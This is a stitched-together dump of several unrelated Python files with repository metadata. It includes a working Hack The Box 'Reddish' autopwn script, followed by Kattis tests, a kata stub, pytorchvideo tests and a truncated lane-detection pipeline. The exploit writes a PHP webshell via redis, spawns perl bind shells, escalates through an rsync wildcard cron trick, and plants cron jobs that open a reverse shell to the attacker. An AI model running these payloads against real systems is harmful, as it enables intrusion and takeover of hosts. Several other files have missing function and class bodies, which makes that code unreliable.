| 39.117264 | 118 | 0.670081 |
62034dcbe266726fc371d74a18776dc2103cd7d1 | 12,848 | py | Python | hacking/HTB/Reddish/autopwn_reddish.py | Qazeer/code-snippets | 6b15afb66312cbcf7c29f9ea32933ad0cbf65154 | [
"Unlicense"
] | 219 | 2017-12-12T20:05:37.000Z | 2022-03-27T06:08:08.000Z | hacking/HTB/Reddish/autopwn_reddish.py | FDlucifer/code-snippets | 2635cf04bc90f1cd0e6b850a9b70d689f1ab7aba | [
"Unlicense"
] | 3 | 2018-11-10T13:33:42.000Z | 2020-10-21T13:53:00.000Z | hacking/HTB/Reddish/autopwn_reddish.py | FDlucifer/code-snippets | 2635cf04bc90f1cd0e6b850a9b70d689f1ab7aba | [
"Unlicense"
] | 108 | 2017-12-17T18:17:14.000Z | 2022-03-15T13:24:44.000Z | #!/usr/bin/env python2
# Author: Alamot
import json
import time
import uuid
import fcntl
import base64
import urllib
import random
import requests
from pwn import *
# context.log_level = 'debug'

# Attacker-side connection parameters; LPORT2/LPORT3 are randomized so
# repeated runs do not collide with stale listeners on the targets.
LHOST = get_ip_address('tun0')
LPORT1 = "60000"
LPORT2 = str(random.randint(60003, 62535))
LPORT3 = str(random.randint(62535, 65535))
LPORT4 = "60001"
# Random 8-char run id: every dropped artifact is namespaced with it so
# previous/parallel runs of the exploit do not interfere.
UUIDNAME = str(uuid.uuid4())[:8]
SOCAT_SRCPATH = "socat"
SOCAT_DSTPATH = "/var/tmp/socat" + UUIDNAME
SUBASH_PATH = "/var/tmp/" + UUIDNAME
CRONPL_PATH = "/tmp/" + UUIDNAME

# Interactive menu: choose how deep into the container chain to pivot.
print("What shell do you want?")
print("[1] root@nodered")
print("[2] www-data@www")
print("[3] root@www")
print("[4] root@backup")
print("[5] root@reddish")
print("[6] Exit")
response = None
while response not in ["1", "2", "3", "4", "5", "6"]:
    response = raw_input("Please enter a number 1-6: ").strip()
if response == "6":
    sys.exit()

# Deliver the initial payloads in the background (send_payloads is defined
# elsewhere in this file), then wait for the first reverse shell on LPORT1.
try:
    threading.Thread(target=send_payloads).start()
except Exception as e:
    log.error(str(e))
socat = listen(LPORT1, bindaddr=LHOST, timeout=20).wait_for_connection()
if response == "1":
    socat.interactive()
    sys.exit()
# Stage 2: from nodered, speak raw RESP to the internal redis and abuse
# CONFIG SET dbfilename/dir to write a PHP webshell into the www docroot,
# then request it to confirm command execution as www-data.
with log.progress("Uploading " + UUIDNAME + ".php on the www container via redis") as p:
    socat.sendline("/bin/echo -ne '*1\\r\\n$8\\r\\nFLUSHALL\\r\\n*3\\r\\n$3\\r\\nSET\\r\\n$1\\r\\n1\\r\\n$45\\r\\n<?php echo shell_exec($_GET[\"e\"].\" 2>&1\"); ?>\\r\\n*4\\r\\n$6\\r\\nCONFIG\\r\\n$3\\r\\nSET\\r\\n$10\\r\\ndbfilename\\r\\n$12\\r\\n" + UUIDNAME + ".php\\r\\n*4\\r\\n$6\\r\\nCONFIG\\r\\n$3\\r\\nSET\\r\\n$3\\r\\ndir\\r\\n$46\\r\\n/var/www/html/8924d0549008565c554f8128cd11fda4\\r\\n*1\\r\\n$4\\r\\nSAVE\\r\\n' | " + SOCAT_DSTPATH + " - TCP:redis:6379")
    # Hit the webshell with whoami@hostname to verify it landed.
    socat.sendline("/bin/echo -ne 'GET /8924d0549008565c554f8128cd11fda4/" + UUIDNAME+ ".php?e=$(whoami)@$(hostname)END HTTP/1.1\\r\\nHost: nodered\\r\\nUser-agent: curl\\r\\n\\r\\n' | " + SOCAT_DSTPATH + " - TCP:www:80")
    output = socat.recvuntil("www-data@www")
    if "www-data@www" in output:
        p.success("OK (user = www-data@www)")
    else:
        p.failure("FAIL")
        sys.exit()

# Stage 3: use the webshell to spawn a perl bind shell on www, then bridge
# to it through the socat binary previously dropped on nodered.
with log.progress("Sending perl bind shell [www-data@www:" + str(LPORT2) + "] via " + UUIDNAME + ".php & trying to connect") as p:
    perl_payload = "perl -e 'use Socket;$p=" + str(LPORT2) +";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,\">&C\");open(STDOUT,\">&C\");open(STDERR,\">&C\");exec(\"/bin/bash -i\");};'"
    urled_perl_payload = urllib.quote_plus(perl_payload)
    socat.sendline("/bin/echo -ne 'GET /8924d0549008565c554f8128cd11fda4/" + UUIDNAME + ".php?e=" + urled_perl_payload + " HTTP/1.1\\r\\nHost: nodered\\r\\nUser-Agent: curl\\r\\n\\r\\n' | " + SOCAT_DSTPATH + " - TCP:www:80")
    socat.sendline(SOCAT_DSTPATH + " file:`tty`,echo=0,rawer TCP:www:" + str(LPORT2))
    output = socat.recvuntil("shell", timeout=20)
    if "shell" in output:
        p.success("OK")
    else:
        p.failure("FAIL")
        sys.exit()
# Upgrade the dumb bind shell to a proper PTY.
socat.sendline("script --return -c '/bin/bash -i' /dev/null")
socat.clean(1)
socat.sendline("stty raw -echo")
if response == "2":
    socat.interactive()
    sys.exit()

# Stage 4: privesc on www via the rsync wildcard trick -- a root cron job
# rsyncs *.rdb files with a shell wildcard, so a file literally named
# "-e sh <name>.rdb" is parsed as an rsync option and executes our .rdb
# script, which drops a setuid-root copy of bash.
with log.progress("Exploiting wildcards for privesc. Wait at most 180 secs for rsync backup job to run") as p:
    socat.sendline('echo "/bin/cp /bin/bash ' + SUBASH_PATH + ';/bin/chmod 4755 ' + SUBASH_PATH + '" > "/var/www/html/f187a0ec71ce99642e4f0afbd441a68b/' + UUIDNAME + '.rdb"')
    socat.sendline('touch "/var/www/html/f187a0ec71ce99642e4f0afbd441a68b/-e sh ' + UUIDNAME + '.rdb"')
    count = 0
    while True:
        p.status(str(count))
        sleep(1)
        # Poll once per second until the cron job has produced the setuid shell.
        socat.sendline("[ -f " + SUBASH_PATH + " ] && echo 'OK' || echo 'NO'")
        socat.recvuntil('$ ')
        output = socat.recv(3).strip()
        if "OK" in output:
            p.success("OK")
            break
        count += 1
        if count > 180:
            p.failure("FAIL")
            sys.exit()

# Become root on www via the setuid bash (-p keeps the effective uid).
socat.sendline(SUBASH_PATH + ' -i -p')
socat.sendline("cd /root")
socat.clean(1)
if response == "3":
    socat.interactive()
    sys.exit()
# Stage 5: root@www can rsync into the backup container as root; plant a
# perl bind-shell script plus a /etc/cron.d entry that runs it every
# minute, then connect once the job has fired.
with log.progress("Sending a cronjob for bind shell [root@backup:" +str(LPORT3)+ "]. Please wait") as p:
    socat.sendline("echo 'use Socket;$p=" + str(LPORT3) + ";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,\">&C\");open(STDOUT,\">&C\");open(STDERR,\">&C\");exec(\"/bin/bash -i\");};' > " + CRONPL_PATH + ".pl")
    socat.sendline("echo '* * * * * root /usr/bin/perl " + CRONPL_PATH + ".pl' > " + CRONPL_PATH + "cronjob")
    socat.sendline("rsync -a " + CRONPL_PATH + ".pl backup::src" + CRONPL_PATH + ".pl")
    socat.sendline("rsync -a " + CRONPL_PATH + "cronjob backup::src/etc/cron.d/")
    # Cron fires once a minute; wait out a full cycle before connecting.
    for i in range(62):
        p.status(str(61 - i))
        time.sleep(1)
    # Pure-perl non-blocking TCP relay bridging this shell to backup:LPORT3.
    socat.sendline("perl -MFcntl=F_SETFL,F_GETFL,O_NONBLOCK -MSocket '-e$0=perl;socket($c,AF_INET,SOCK_STREAM,0)&&connect($c,pack_sockaddr_in("+ str(LPORT3) + ",inet_aton(\"backup\")))||die$!;fcntl$_,F_SETFL,O_NONBLOCK|fcntl$_,F_GETFL,0 for@d=(*STDIN,$c),@e=($c,*STDOUT);L:for(0,1){sysread($d[$_],$f,8**5)||exit and$f[$_].=$f if vec$g,$_*($h=fileno$c),1;substr$f[$_],0,syswrite($e[$_],$f[$_],8**5),\"\";vec($g,$_*$h,1)=($i=length$f[$_]<8**5);vec($j,$_||$h,1)=!!$i}select$g,$j,$k,5;goto L'")
    output = socat.recvuntil("shell", timeout=20)
    if "shell" in output:
        p.success("OK")
    else:
        p.failure("FAIL")
        sys.exit()

# PTY upgrade on the backup shell.
socat.sendline("script --return -c '/bin/bash -i' /dev/null")
socat.clean(1)
socat.sendline("stty raw -echo")
if response == "4":
    socat.interactive()
    sys.exit()

# Stage 6: backup exposes the host's /dev/sda1 -- mount it, print the host
# root flag, and drop a cron.d reverse shell that the *host* root cron
# executes, calling back to us on LPORT4.
with log.progress("Sending reverse shell cronjob [" + LHOST + ":" +str(LPORT4)+ "] for root@host. Please wait") as p:
    socat.sendline("mkdir /mnt/sda1")
    socat.sendline("mount /dev/sda1 /mnt/sda1")
    socat.sendline("cat /mnt/sda1/root/root.txt")
    socat.sendline("echo 'import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + LHOST + "\"," + str(LPORT4) + "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\"HISTFILE\",\"/dev/null\");pty.spawn([\"/bin/bash\",\"-i\"]);s.close();exit();' > /mnt/sda1/tmp/" + UUIDNAME + ".py")
    socat.sendline("echo '* * * * * root /usr/bin/python /tmp/" + UUIDNAME + ".py' > /mnt/sda1/etc/cron.d/" + UUIDNAME + "cronjob")
    host_shell = listen(LPORT4, bindaddr=LHOST, timeout=65).wait_for_connection()
    if host_shell.sock is None:
        p.failure("FAIL")
        sys.exit()
    else:
        p.success("OK")
host_shell.interactive()
sys.exit()
'''
$ ./autopwn_reddish.py
What shell do you want?
[1] root@nodered
[2] www-data@www
[3] root@www
[4] root@backup
[5] root@reddish
[6] Exit
Please enter a number 1-6: 5
[+] Getting our id: OK (id = 25af4604ab3402f2bdea796ac32bbcc3)
[+] Trying to bind to 10.10.12.229 on port 60000: Done
[+] Waiting for connections on 10.10.12.229:60000: Got connection from 10.10.10.94 on port 46784
[+] Loading node-red flows: OK
[+] Injecting base64-encoded socat: OK
[+] Injecting socat reverse shell via nodejs [10.10.12.229:60000]: OK
[+] Uploading 1994851d.php on the www container via redis: OK (user = www-data@www)
[+] Sending perl bind shell [www-data@www:61031] via 1994851d.php & trying to connect: OK
[+] Exploiting wildcards for privesc. Wait at most 180 secs for rsync backup job to run: OK
[+] Sending a cronjob for bind shell [root@backup:65104]. Please wait: OK
[+] Sending reverse shell cronjob 10.10.12.229:60001] for root@host. Please wait: OK
[+] Trying to bind to 10.10.12.229 on port 60001: Done
[+] Waiting for connections on 10.10.12.229:60001: Got connection from 10.10.10.94 on port 50432
[*] Switching to interactive mode
root@reddish:~# $
'''
| 53.090909 | 1,448 | 0.611768 |
6204c146ab9d8f200d7b8f6e6bb1d0148b8857e7 | 1,735 | py | Python | test/test_k_apaxiaaans.py | ivanlyon/exercises | 0792976ae2acb85187b26a52812f9ebdd119b5e8 | [
"MIT"
] | null | null | null | test/test_k_apaxiaaans.py | ivanlyon/exercises | 0792976ae2acb85187b26a52812f9ebdd119b5e8 | [
"MIT"
] | null | null | null | test/test_k_apaxiaaans.py | ivanlyon/exercises | 0792976ae2acb85187b26a52812f9ebdd119b5e8 | [
"MIT"
] | null | null | null | import io
import unittest
from unittest.mock import patch
from kattis import k_apaxiaaans
###############################################################################
###############################################################################
if __name__ == '__main__':
    # Discover and run the TestCase classes defined in this module.
    unittest.main()
| 36.145833 | 79 | 0.571182 |
6204c171addcdbab6da1839b62dea0022b3b30e5 | 829 | py | Python | kata/Greeting My Friends [Arrays].py | DJO3/code_wars | 8e9bc8cd903bfc61dafaf11cb9ff289f469e761f | [
"MIT"
] | null | null | null | kata/Greeting My Friends [Arrays].py | DJO3/code_wars | 8e9bc8cd903bfc61dafaf11cb9ff289f469e761f | [
"MIT"
] | null | null | null | kata/Greeting My Friends [Arrays].py | DJO3/code_wars | 8e9bc8cd903bfc61dafaf11cb9ff289f469e761f | [
"MIT"
] | null | null | null | """
We give you an Array of friend's list.
Write a function called greeting_for_all_friends that takes one argument, friends.
This method takes an array of friend names and returns an array of greeting messages.
Message sample: for the friend "Bilal" we get "Hello, Bilal!"
Rules:
If the argument is null, the method should return null
If the argument is an empty array, the method should return null
If the argument is a valid array of strings, the method should return a hello message for every array entry
"""
import sys
if __name__ == "__main__":
    # Greet every name passed on the command line.
    f = sys.argv[1:]
    print(greeting_for_all_friends(f))
    # print(greeting_for_all_friends(["Bob"]))
| 28.586207 | 108 | 0.738239 |
6204f9cec65f309afe5538b66f4dfe8bac9af897 | 11,469 | py | Python | tests/test_transforms.py | rushyaP/pytorchvideo | 875b2df67312f5f4c7d581a332701cc7eca11c14 | [
"Apache-2.0"
] | 1 | 2021-05-20T21:25:14.000Z | 2021-05-20T21:25:14.000Z | tests/test_transforms.py | rushyaP/pytorchvideo | 875b2df67312f5f4c7d581a332701cc7eca11c14 | [
"Apache-2.0"
] | null | null | null | tests/test_transforms.py | rushyaP/pytorchvideo | 875b2df67312f5f4c7d581a332701cc7eca11c14 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import unittest
from collections import Counter
import numpy as np
import torch
from pytorchvideo.data.utils import thwc_to_cthw
from pytorchvideo.transforms import (
ApplyTransformToKey,
Normalize,
OpSampler,
RandomShortSideScale,
UniformCropVideo,
UniformTemporalSubsample,
)
from pytorchvideo.transforms.functional import (
convert_to_one_hot,
uniform_temporal_subsample_repeated,
short_side_scale,
uniform_crop,
uniform_temporal_subsample,
)
from torchvision.transforms import Compose
from torchvision.transforms._transforms_video import (
NormalizeVideo,
RandomCropVideo,
RandomHorizontalFlipVideo,
)
from utils import create_dummy_video_frames
| 38.35786 | 88 | 0.624553 |
62053e8d0f3189aeee01ea44d5273ade06244a54 | 20,905 | py | Python | udacity-program_self_driving_car_engineer_v1.0/project04-lane_detection_advanced/project/full_pipeline.py | linksdl/futuretec-project-self_driving_cars_projects | 38e8f14543132ec86a8bada8d708eefaef23fee8 | [
"MIT"
] | null | null | null | udacity-program_self_driving_car_engineer_v1.0/project04-lane_detection_advanced/project/full_pipeline.py | linksdl/futuretec-project-self_driving_cars_projects | 38e8f14543132ec86a8bada8d708eefaef23fee8 | [
"MIT"
] | null | null | null | udacity-program_self_driving_car_engineer_v1.0/project04-lane_detection_advanced/project/full_pipeline.py | linksdl/futuretec-project-self_driving_cars_projects | 38e8f14543132ec86a8bada8d708eefaef23fee8 | [
"MIT"
] | null | null | null | """
# !/usr/bin/env python
# -*- coding: utf-8 -*-
@Time : 2022/2/24 20:12
@Author : shengdl999links@gmail.com
@ProjectName : udacity-program_self_driving_car_engineer_v1.0_source.0
@File : full_pipeline.py
"""
import numpy as np
import cv2
import os
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import glob
from moviepy.editor import VideoFileClip
# Load in the chessboard calibration images to a list
cal_image_loc = glob.glob('camera_cal/calibration*.jpg')

# Prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0):
# one grid point per inner corner of the 9x6 chessboard, z fixed at 0.
objp = np.zeros((6 * 9, 3), np.float32)
objp[:, :2] = np.mgrid[0:9, 0:6].T.reshape(-1, 2)

# Arrays for later storing object points and image points
obj_points = []  # 3d points in real world space
img_points = []  # 2d points in image plane.

# Make a list of calibration images
calibration_images = []
for im in cal_image_loc:
    img = mpimg.imread(im)
    calibration_images.append(img)

# Toggle to visualize the detected corners while calibrating.
verbose = False

# Iterate through images for their points
for image in calibration_images:
    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    # Find the chessboard corners
    pattern_found, corners = cv2.findChessboardCorners(gray, (9, 6), None)
    if pattern_found is True:
        obj_points.append(objp)
        img_points.append(corners)
        if verbose:
            # Draw and display the corners
            img = cv2.drawChessboardCorners(image, (9, 6), corners, pattern_found)
            cv2.imshow('img', img)
            cv2.waitKey(500)
if verbose:
    cv2.destroyAllWindows()

# Returns camera calibration (mtx/dist are used module-wide below).
# NOTE(review): `gray` is whatever image the loop processed last; if
# camera_cal/ is empty this raises NameError -- confirm it is always populated.
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(obj_points, img_points, gray.shape[::-1], None, None)
def pipeline(img, s_thresh=(125, 255), sx_thresh=(10, 100), R_thresh=(200, 255), sobel_kernel=3):
    """Create a binary lane-pixel mask from an RGB road image.

    The image is first undistorted with the module-level camera calibration
    (``mtx``/``dist``).  Three detectors are then thresholded:

    * the R color channel (``R_thresh``),
    * the HLS S (saturation) channel (``s_thresh``),
    * the Sobel x gradient of the HLS L channel (``sx_thresh``).

    A pixel is activated in the output when at least two of the three
    detectors agree.

    Args:
        img: RGB image of shape (H, W, 3).
        s_thresh: inclusive (low, high) threshold on the S channel.
        sx_thresh: inclusive (low, high) threshold on the scaled Sobel x gradient.
        R_thresh: inclusive (low, high) threshold on the R channel.
        sobel_kernel: aperture size for the Sobel operator.

    Returns:
        2-D array of 0/1 activations, same height/width as ``img``.
    """
    distorted_img = np.copy(img)
    dst = cv2.undistort(distorted_img, mtx, dist, None, mtx)

    # Pull R channel of the (undistorted) RGB image.
    R = dst[:, :, 0]

    # Convert to HLS colorspace: L drives the gradient detector, S the color
    # detector.  np.float64 replaces the deprecated np.float alias, which was
    # removed in NumPy 1.24 and raises AttributeError there.
    hls = cv2.cvtColor(dst, cv2.COLOR_RGB2HLS).astype(np.float64)
    l_channel = hls[:, :, 1]
    s_channel = hls[:, :, 2]

    # Sobelx - takes the derivative in x, absolute value, then rescale to 0-255.
    sobelx = cv2.Sobel(l_channel, cv2.CV_64F, 1, 0, ksize=sobel_kernel)
    abs_sobelx = np.absolute(sobelx)
    scaled_sobelx = np.uint8(255 * abs_sobelx / np.max(abs_sobelx))

    # Threshold x gradient
    sxbinary = np.zeros_like(scaled_sobelx)
    sxbinary[(scaled_sobelx >= sx_thresh[0]) & (scaled_sobelx <= sx_thresh[1])] = 1

    # Threshold R color channel
    R_binary = np.zeros_like(R)
    R_binary[(R >= R_thresh[0]) & (R <= R_thresh[1])] = 1

    # Threshold S color channel
    s_binary = np.zeros_like(s_channel)
    s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1

    # Majority vote: if two of the three are activated, activate the output.
    combined_binary = np.zeros_like(sxbinary)
    combined_binary[((s_binary == 1) & (sxbinary == 1)) | ((sxbinary == 1) & (R_binary == 1))
                    | ((s_binary == 1) & (R_binary == 1))] = 1
    return combined_binary
def birds_eye(img, mtx, dist):
    """Warp a road image to a top-down ("bird's eye") view.

    The image is run through the binary-thresholding pipeline, undistorted
    with the supplied calibration, then perspective-warped from a trapezoid
    around the lane-line edges onto an inset rectangle, as if the road were
    seen from above.

    Returns:
        (top_down, M): the warped binary image and the transform matrix.
    """
    # Binary lane mask, then undistort it with the camera calibration.
    undistorted = cv2.undistort(pipeline(img), mtx, dist, None, mtx)
    width, height = undistorted.shape[1], undistorted.shape[0]

    # Trapezoid around the lane-line edges in the source image...
    src_pts = np.float32([[690, 450], [1110, height], [175, height], [595, 450]])
    # ...mapped onto a rectangle inset by a fixed horizontal offset.
    inset = 300
    dst_pts = np.float32([[width - inset, 0], [width - inset, height],
                          [inset, height], [inset, 0]])

    # Perspective matrix and the warped, top-down view.
    M = cv2.getPerspectiveTransform(src_pts, dst_pts)
    top_down = cv2.warpPerspective(undistorted, M, (width, height))
    return top_down, M
def count_check(line):
    """Flag a lane line as undetected after five consecutive failures.

    Once ``line.counter`` reaches 5, ``line.detected`` is cleared so the
    caller falls back to a fresh sliding-window search.
    """
    if line.counter < 5:
        return
    line.detected = False
def first_lines(img, mtx, dist):
    """ First Lines uses the birds eye image from above,
    creates a histogram of where the binary activations occur,
    and uses sliding windows along the peak areas to estimate
    where the lane lines are.

    Results are stored on the module-level ``left_line`` / ``right_line``
    state objects (current/recent/best fits, pixel positions, detected flag);
    nothing is returned.
    """
    # Load the birds eye image and transform matrix from birds_eye
    binary_warped, perspective_M = birds_eye(img, mtx, dist)
    # Histogram of the bottom half of the image.
    # FIX: use integer floor division - a float is not a valid slice index on
    # Python 3, and the np.int alias used originally was removed in NumPy 1.24.
    histogram = np.sum(binary_warped[binary_warped.shape[0] // 2:, :], axis=0)
    # Output image to draw on and visualize the result
    out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
    # Find the peak of the left and right halves of the histogram
    # These will be the starting point for the left and right lines
    midpoint = histogram.shape[0] // 2
    leftx_base = np.argmax(histogram[:midpoint])
    rightx_base = np.argmax(histogram[midpoint:]) + midpoint
    # Choose the number of sliding windows
    nwindows = 9
    # Set height of windows (integer pixels)
    window_height = binary_warped.shape[0] // nwindows
    # Identify the x and y positions of all nonzero pixels in the image
    nonzero = binary_warped.nonzero()
    nonzeroy = np.array(nonzero[0])
    nonzerox = np.array(nonzero[1])
    # Current positions to be updated for each window
    leftx_current = leftx_base
    rightx_current = rightx_base
    # Set the width of the windows +/- margin
    margin = 100
    # Set minimum number of pixels found to recenter window
    minpix = 50
    # Create empty lists to receive left and right lane pixel indices
    left_lane_inds = []
    right_lane_inds = []
    # Step through the windows one by one
    for window in range(nwindows):
        # Identify window boundaries in x and y (and right and left)
        win_y_low = binary_warped.shape[0] - (window + 1) * window_height
        win_y_high = binary_warped.shape[0] - window * window_height
        win_xleft_low = leftx_current - margin
        win_xleft_high = leftx_current + margin
        win_xright_low = rightx_current - margin
        win_xright_high = rightx_current + margin
        # Draw the windows on the visualization image
        cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high), (0, 255, 0), 2)
        cv2.rectangle(out_img, (win_xright_low, win_y_low), (win_xright_high, win_y_high), (0, 255, 0), 2)
        # Identify the nonzero pixels in x and y within the window
        good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) & (
            nonzerox < win_xleft_high)).nonzero()[0]
        good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (
            nonzerox < win_xright_high)).nonzero()[0]
        # Append these indices to the lists
        left_lane_inds.append(good_left_inds)
        right_lane_inds.append(good_right_inds)
        # If you found > minpix pixels, recenter next window on their mean position
        # FIX: builtin int replaces the removed np.int alias
        if len(good_left_inds) > minpix:
            leftx_current = int(np.mean(nonzerox[good_left_inds]))
        if len(good_right_inds) > minpix:
            rightx_current = int(np.mean(nonzerox[good_right_inds]))
    # Concatenate the arrays of indices
    left_lane_inds = np.concatenate(left_lane_inds)
    right_lane_inds = np.concatenate(right_lane_inds)
    # Extract left and right line pixel positions
    leftx = nonzerox[left_lane_inds]
    lefty = nonzeroy[left_lane_inds]
    rightx = nonzerox[right_lane_inds]
    righty = nonzeroy[right_lane_inds]
    # Fit a second order polynomial to each
    # The challenge videos sometimes throw errors, so the below try first
    # Upon the error being thrown, set line.detected to False
    # Left line first
    try:
        n = 5  # number of recent fits kept for smoothing
        left_line.current_fit = np.polyfit(lefty, leftx, 2)
        left_line.all_x = leftx
        left_line.all_y = lefty
        left_line.recent_fit.append(left_line.current_fit)
        if len(left_line.recent_fit) > 1:
            # Relative change between the two newest fits (diagnostic only)
            left_line.diffs = (left_line.recent_fit[-2] - left_line.recent_fit[-1]) / left_line.recent_fit[-2]
        left_line.recent_fit = left_line.recent_fit[-n:]
        left_line.best_fit = np.mean(left_line.recent_fit, axis=0)
        left_fit = left_line.current_fit
        left_line.detected = True
        left_line.counter = 0
    except TypeError:
        left_fit = left_line.best_fit
        left_line.detected = False
    except np.linalg.LinAlgError:
        left_fit = left_line.best_fit
        left_line.detected = False
    # Next, right line
    try:
        n = 5
        right_line.current_fit = np.polyfit(righty, rightx, 2)
        right_line.all_x = rightx
        right_line.all_y = righty
        right_line.recent_fit.append(right_line.current_fit)
        if len(right_line.recent_fit) > 1:
            right_line.diffs = (right_line.recent_fit[-2] - right_line.recent_fit[-1]) / right_line.recent_fit[-2]
        right_line.recent_fit = right_line.recent_fit[-n:]
        right_line.best_fit = np.mean(right_line.recent_fit, axis=0)
        right_fit = right_line.current_fit
        right_line.detected = True
        right_line.counter = 0
    except TypeError:
        right_fit = right_line.best_fit
        right_line.detected = False
    except np.linalg.LinAlgError:
        right_fit = right_line.best_fit
        right_line.detected = False
def second_ord_poly(line, val):
    """Evaluate the quadratic with coefficients ``line`` ([a, b, c]) at ``val``.

    Helper for draw_lines: finds where each lane polynomial meets the bottom
    of the image when computing the car's offset from lane centre.
    """
    quad, lin, const = line[0], line[1], line[2]
    return quad * val ** 2 + lin * val + const
def draw_lines(img, mtx, dist):
    """ Draw Lines will first check whether the lines are detected.
    If not, go back up to First Lines. If they are, we do not have to search
    the whole image for the lines. We can then draw the lines,
    as well as detect where the car is in relation to the middle of the lane,
    and what type of curvature it is driving at.

    Returns the original frame annotated with the lane polygon, the radius of
    curvature and the distance from lane centre.
    """
    # Pull in the image
    binary_warped, perspective_M = birds_eye(img, mtx, dist)
    # Re-run the sliding-window search if either line was lost.
    # FIX: the original test
    #   left_line.detected == False | right_line.detected == False
    # parses as a chained comparison around bitwise "|" and only fired when
    # BOTH lines were lost, so a single lost line was never re-detected.
    if not left_line.detected or not right_line.detected:
        first_lines(img, mtx, dist)
    # Set the fit as the current fit for now
    left_fit = left_line.current_fit
    right_fit = right_line.current_fit
    # Again, find the lane indicators within +/- margin of the previous fits
    nonzero = binary_warped.nonzero()
    nonzeroy = np.array(nonzero[0])
    nonzerox = np.array(nonzero[1])
    margin = 100
    left_lane_inds = ((nonzerox > (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] - margin)) & (
        nonzerox < (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] + margin)))
    right_lane_inds = (
        (nonzerox > (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] - margin)) & (
            nonzerox < (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] + margin)))
    # Set the x and y values of points on each line
    leftx = nonzerox[left_lane_inds]
    lefty = nonzeroy[left_lane_inds]
    rightx = nonzerox[right_lane_inds]
    righty = nonzeroy[right_lane_inds]
    # Fit a second order polynomial to each again.
    # Similar to first_lines, need to try in case of errors
    # Left line first
    try:
        n = 5  # number of recent fits kept for smoothing
        left_line.current_fit = np.polyfit(lefty, leftx, 2)
        left_line.all_x = leftx
        left_line.all_y = lefty
        left_line.recent_fit.append(left_line.current_fit)
        if len(left_line.recent_fit) > 1:
            left_line.diffs = (left_line.recent_fit[-2] - left_line.recent_fit[-1]) / left_line.recent_fit[-2]
        left_line.recent_fit = left_line.recent_fit[-n:]
        left_line.best_fit = np.mean(left_line.recent_fit, axis=0)
        left_fit = left_line.current_fit
        left_line.detected = True
        left_line.counter = 0
    except TypeError:
        left_fit = left_line.best_fit
        count_check(left_line)
    except np.linalg.LinAlgError:
        left_fit = left_line.best_fit
        count_check(left_line)
    # Now right line
    try:
        n = 5
        right_line.current_fit = np.polyfit(righty, rightx, 2)
        right_line.all_x = rightx
        right_line.all_y = righty
        right_line.recent_fit.append(right_line.current_fit)
        if len(right_line.recent_fit) > 1:
            right_line.diffs = (right_line.recent_fit[-2] - right_line.recent_fit[-1]) / right_line.recent_fit[-2]
        right_line.recent_fit = right_line.recent_fit[-n:]
        right_line.best_fit = np.mean(right_line.recent_fit, axis=0)
        right_fit = right_line.current_fit
        right_line.detected = True
        right_line.counter = 0
    except TypeError:
        right_fit = right_line.best_fit
        count_check(right_line)
    except np.linalg.LinAlgError:
        right_fit = right_line.best_fit
        count_check(right_line)
    # Generate x and y values for plotting
    fity = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])
    fit_leftx = left_fit[0] * fity ** 2 + left_fit[1] * fity + left_fit[2]
    fit_rightx = right_fit[0] * fity ** 2 + right_fit[1] * fity + right_fit[2]
    # (Removed dead code: an unused visualization image, unused search-window
    # polygons, and a pixel-space curvature that was immediately overwritten
    # by the metre-space one below.)
    y_eval = np.max(fity)
    # Define conversions in x and y from pixels space to meters
    ym_per_pix = 30 / 720  # meters per pixel in y dimension
    xm_per_pix = 3.7 / 700  # meters per pixel in x dimension
    # Fit new polynomials to x,y in world space
    left_fit_cr = np.polyfit(left_line.all_y * ym_per_pix, left_line.all_x * xm_per_pix, 2)
    right_fit_cr = np.polyfit(right_line.all_y * ym_per_pix, right_line.all_x * xm_per_pix, 2)
    # Calculate the radii of curvature in meters
    left_curverad = ((1 + (2 * left_fit_cr[0] * y_eval * ym_per_pix + left_fit_cr[1]) ** 2) ** 1.5) / np.absolute(
        2 * left_fit_cr[0])
    right_curverad = ((1 + (2 * right_fit_cr[0] * y_eval * ym_per_pix + right_fit_cr[1]) ** 2) ** 1.5) / np.absolute(
        2 * right_fit_cr[0])
    avg_rad = round(np.mean([left_curverad, right_curverad]), 0)
    rad_text = "Radius of Curvature = {}(m)".format(avg_rad)
    # Calculating middle of the image, aka where the car camera is
    middle_of_image = img.shape[1] / 2
    car_position = middle_of_image * xm_per_pix
    # Calculating middle of the lane
    left_line_base = second_ord_poly(left_fit_cr, img.shape[0] * ym_per_pix)
    right_line_base = second_ord_poly(right_fit_cr, img.shape[0] * ym_per_pix)
    lane_mid = (left_line_base + right_line_base) / 2
    # Calculate distance from center and list differently based on left or right
    dist_from_center = lane_mid - car_position
    if dist_from_center >= 0:
        center_text = "{} meters left of center".format(round(dist_from_center, 2))
    else:
        center_text = "{} meters right of center".format(round(-dist_from_center, 2))
    # List car's position in relation to middle on the image and radius of curvature
    font = cv2.FONT_HERSHEY_SIMPLEX
    cv2.putText(img, center_text, (10, 50), font, 1, (255, 255, 255), 2)
